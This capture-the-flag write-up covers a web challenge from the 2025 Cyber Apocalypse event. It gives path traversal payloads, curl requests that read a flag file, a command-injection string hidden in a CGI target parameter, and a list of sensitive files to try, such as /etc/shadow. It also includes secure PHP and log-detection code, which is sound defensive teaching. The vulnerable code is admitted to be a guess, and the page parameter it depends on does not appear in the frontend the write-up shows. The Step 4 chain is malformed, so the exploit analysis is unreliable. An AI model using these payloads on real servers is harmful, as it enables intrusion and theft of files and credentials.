2025 Cyber Apocalypse: Web Cyber Attack

Challenge Information

Attribute | Details
Event | 2025 Cyber Apocalypse
Category | Web
Challenge | Cyber Attack

Summary

The Cyber Attack challenge presents “Eldoria Cyber Attack”, a themed web application that allows users to simulate attacks on domains and IPs. The application contains a critical path traversal vulnerability that allows attackers to read arbitrary files from the server filesystem, including the flag.


Analysis

Application Overview

Frontend (src/index.php):

The application features:

  • Lore text encouraging attacks against resistance forces
  • Name input field
  • Domain or IP input field
  • Two attack buttons: “Attack a Domain” and “Attack an IP”
  • Results display area

<!DOCTYPE HTML>
<html lang="en">
<head>
  <title>Eldoria Cyber Attack</title>
  <!-- RPGUI styling -->
</head>
<body>
  <div class="rpgui-content">
    <div class="rpgui-container framed">
      <h1>Welcome to Eldoria Cyber Attack</h1>
      <label for="user-name">Enter Your Name:</label>
      <input type="text" id="user-name" name="user-name" placeholder="Name" required>
      <label for="target">Enter Domain or IP:</label>
      <input type="text" id="target" name="target" placeholder="Domain or IP" required>
      <button class="rpgui-button golden" id="attack-domain">
        <p>Attack a Domain</p>
      </button>
      <button class="rpgui-button golden" id="attack-ip">
        <p>Attack an IP</p>
      </button>
    </div>
  </div>
</body>
</html>

Key Vulnerability: Path Traversal

Vulnerable Parameter: The page parameter in attack requests

Attack Endpoint: index.php?page=<path>

Vulnerability: The application constructs file paths without proper validation, allowing directory traversal sequences (../) to escape the intended directory.

PHP Implementation Weakness

// VULNERABLE CODE (likely implementation)
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    // No validation - allows traversal!
    include $_SERVER['DOCUMENT_ROOT'] . "/" . $page;
}

Solution

Step 1: Identify Vulnerable Parameter

The attack buttons redirect to CGI endpoints:

window.location.href = `cgi-bin/attack-domain?target=${target}&name=${name}`;
window.location.href = `cgi-bin/attack-ip?target=${target}&name=${name}`;

Test for path traversal in the target parameter or other endpoints.

Step 2: Craft Path Traversal Payload

Use directory traversal sequences to reach the flag file:

page=../../../../var/www/html/flag.txt

Or in a complete request:

GET /index.php?page=../../../../var/www/html/flag.txt HTTP/1.1
Host: target.com

Step 3: Exploit with curl

Execute the path traversal attack:

curl "http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt"

Step 4: Alternative Exploitation

If direct inclusion fails, chain with command execution:

# URL-encoded payload
curl "http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt%20-o%20/tmp/f%20&&%20cat%20/tmp/f"

Or using the attack endpoint:

curl "http://127.0.0.1/cgi-bin/attack-domain?target=example.com;curl%20http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt%20-o%20/tmp/f%20&&%20cat%20/tmp/f"

Step 5: Extract Flag

Once the vulnerability is exploited, the flag file contents are displayed or can be read from the response.


Vulnerability Details

Root Cause

The application fails to validate or sanitize the page parameter, allowing:

  1. Directory traversal (../)
  2. Absolute path access (/etc/passwd)
  3. Remote file inclusion (if allow_url_include is enabled)

Attack Vector

Input: ../../../../var/www/html/flag.txt
Process: $_SERVER['DOCUMENT_ROOT'] . "/" . "../../../../var/www/html/flag.txt"
Result: Includes /var/www/html/flag.txt (traverses out of intended directory)

Impact

  • Confidentiality: Read arbitrary files (configuration, credentials, source code)
  • Integrity: Potentially write files if function allows
  • Availability: DoS through resource exhaustion

Secure Implementation

Whitelist Approach:

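<?php
// Only these page names can ever be included
$allowed_pages = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';
// Strict comparison so only exact string matches pass
if (!in_array($page, $allowed_pages, true)) {
    die("Invalid page");
}
include "./pages/{$page}.php";
?>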

Input Validation:

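<?php
$page = $_GET['page'] ?? '';
// Reject non-string input such as page[]=x
if (!is_string($page)) {
    die("Invalid page");
}
// Remove dangerous sequences (single-pass stripping is not a control on its own)
$page = str_replace('../', '', $page);
$page = str_replace('..\\', '', $page);
// Allow only alphanumeric and underscores; \A and \z anchor the whole string,
// so a trailing newline cannot slip past the check
if (!preg_match('/\A[a-zA-Z0-9_]+\z/', $page)) {
    die("Invalid page");
}
include "./pages/{$page}.php";
?>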

Proper Path Handling:

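<?php
$base_dir = realpath('./pages/');
$page = $_GET['page'] ?? '';
// realpath() returns false when the path does not exist
$requested_file = is_string($page) ? realpath('./pages/' . $page) : false;
// Verify the requested file exists and is inside the base directory.
// The trailing separator stops sibling directories such as "pages_backup"
// from passing the prefix check.
if ($base_dir === false || $requested_file === false
    || strpos($requested_file, $base_dir . DIRECTORY_SEPARATOR) !== 0) {
    die("Access denied");
}
include $requested_file;
?>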
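
The path resolution from the Attack Vector section and the containment test from Proper Path Handling, modelled as an added Python example (not the challenge's code or the author's). It is purely lexical, so it omits the symlink resolution that realpath() performs; the directory names /var/www/html/pages and pages_backup are assumptions.

```python
import posixpath

DOC_ROOT = "/var/www/html"          # assumed document root, matching the write-up's paths
PAGES_DIR = "/var/www/html/pages"   # assumed base directory for includable pages


def resolve(base: str, user_path: str) -> str:
    """Lexically resolve base + "/" + user_path, collapsing "." and ".." parts.

    Mirrors the string concatenation in the vulnerable include; symlinks are
    not followed here, which realpath() would do in PHP.
    """
    return posixpath.normpath(base + "/" + user_path)


def naive_contained(base: str, resolved: str) -> bool:
    """Plain prefix test: also accepts sibling directories such as pages_backup."""
    return resolved.startswith(base)


def contained(base: str, resolved: str) -> bool:
    """Prefix test on a separator boundary: only base itself or paths below it."""
    base = base.rstrip("/")
    return resolved == base or resolved.startswith(base + "/")


def check(user_path: str) -> tuple[str, bool]:
    """Resolve a requested page under PAGES_DIR and report whether it stays inside."""
    resolved = resolve(PAGES_DIR, user_path)
    return resolved, contained(PAGES_DIR, resolved)


if __name__ == "__main__":
    # Constructed inputs: a normal page, the write-up's payload, a sibling directory.
    for candidate in ("home.php",
                      "../../../../var/www/html/flag.txt",
                      "../pages_backup/old.php"):
        print(candidate, "->", check(candidate))
```

The sibling-directory case is the one a bare prefix comparison gets wrong: it resolves outside pages/ but still starts with the same string.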

Common LFI Payloads

# Linux system files
/etc/passwd
/etc/shadow
/proc/self/environ
/proc/version
# Web server files
/var/www/html/index.php
/var/www/html/config.php
/etc/apache2/apache2.conf
# Application files
../../config.php
../../../../database.yml
../../../secrets.txt
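
On the detection side, requests carrying values like these show up in the web server's access log. The following added example (not part of the original write-up) flags traversal and absolute-path values in the page parameter after percent-decoding; the log lines are constructed samples and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not captured from the challenge).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Mar/2025:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [21/Mar/2025:10:01:07 +0000] "GET /index.php?page=../../../../var/www/html/flag.txt HTTP/1.1" 200 64
10.0.0.9 - - [21/Mar/2025:10:01:09 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fconfig.php HTTP/1.1" 200 301
10.0.0.9 - - [21/Mar/2025:10:01:12 +0000] "GET /index.php?page=%252e%252e%252fsecrets.txt HTTP/1.1" 404 0
10.0.0.7 - - [21/Mar/2025:10:02:00 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1890
10.0.0.5 - - [21/Mar/2025:10:02:30 +0000] "GET /cgi-bin/attack-domain?target=example.com&name=bob HTTP/1.1" 302 0
"""

# client address, request target and status code from a combined-format line
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded input is seen in plain form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str):
    """Return a reason string if the value looks like a file-path probe, else None."""
    path = fully_decode(value).replace("\\", "/")
    if ".." in path.split("/"):
        return "traversal"
    if path.startswith("/"):
        return "absolute-path"
    return None


def scan(log_text: str, param: str = "page"):
    """Return (client, status, reason, decoded value) for suspicious `param` values."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reason = classify(value) if key == param else None
            if reason:
                findings.append((client, int(status), reason, fully_decode(value)))
    return findings
```

Findings with a 200 status deserve attention first, since the server returned content for the requested path.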

Key Takeaways

  • Input Validation is Critical: Never trust user input for file operations
  • Whitelist Over Blacklist: Allow specific files rather than blocking dangerous ones
  • Use realpath(): Resolve paths to detect traversal attempts
  • Principle of Least Privilege: Web server should have minimal file access
  • Separation of Concerns: Keep uploaded/user content separate from application code
  • Security Headers: Use X-Frame-Options, Content-Security-Policy, etc.
  • Error Handling: Don’t expose file paths in error messages

Tools Used

  • curl: Command-line HTTP client for exploitation
  • Burp Suite: Web proxy for intercepting and modifying requests
  • OWASP ZAP: Automated vulnerability scanning
  • Browser DevTools: Network inspection and debugging
